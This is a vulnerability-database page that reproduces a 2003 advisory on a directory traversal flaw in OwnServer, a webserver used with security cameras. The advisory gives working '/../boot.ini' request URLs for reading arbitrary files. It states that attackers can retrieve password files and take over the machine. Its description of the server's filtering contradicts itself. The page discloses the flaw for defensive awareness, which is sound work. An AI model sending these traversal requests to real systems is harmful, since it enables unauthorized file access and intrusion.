Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

OwnServer10.txt

🗓️ 21 Jan 2004 00:00:00Reported by Rafel IvgiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

OwnServer has a high-risk directory traversal vulnerability allowing remote file access.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#######################################################################  
  
Application: OwnServer (Used By Security Cameras Products)  
Vendors: http://www.anteco.co.il  
Big Resellers:  
http://www.anykeeper.com  
http://www.sahar-systems.co.il  
  
Versions: <= 1.0  
Platforms: Windows  
Bug: Directory Transversal Vulnerability  
Risk: High  
Exploitation: Remote with browser  
Date: 25 Dec 2003  
Author: Rafel Ivgi, The-Insider  
e-mail: [email protected]  
web: http://theinsider.deep-ice.com  
  
#######################################################################  
  
1) Introduction  
2) Bug  
3) The Code  
  
#######################################################################  
  
===============  
1) Introduction  
===============  
  
  
OwnServer is a web server used as a webserver for watching security cameras  
remotly.  
It allows broadcasting live streaming video on the web through the built-in  
webserver.  
  
  
#######################################################################  
  
======  
2) Bug  
======  
  
The webserver uses a protection to avoid the directory traversal bug.  
"//" is replaced to ""  
"\." and "\.." is replaced to ""  
"\" is replaced to "/"  
"\\" is replaced to "//"  
  
The webserver uses no protection to avoid the directory traversal bug.  
The problem happens when the attacker uses the classic pattern "/../" that  
allows him to see and download any file in the remote system knowing the  
path.  
This allows any attacker to : Read and download any local file, and in most  
cases retrieve the machine's password files and invade it (using  
ssh,ftp,http,netbios,samba etc...).  
  
#######################################################################  
  
===========  
3) The Code  
===========  
  
http://<host>/../../boot.ini  
http://<host>/../../../boot.ini  
http://<host>/../../../../boot.ini  
http://<host>/../../../../../boot.ini  
http://<host>/../../../../../../boot.ini  
  
#######################################################################  
  
---  
Rafel Ivgi, The-Insider  
http://theinsider.deep-ice.com  
  
"Things that are unlikeable, are NOT impossible."  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
21 Jan 2004 00:00Current
7.4High risk
Vulners AI Score7.4
security camerasdirectory traversalhigh riskremote exploitationwindows platformownserver version
19
.json
Report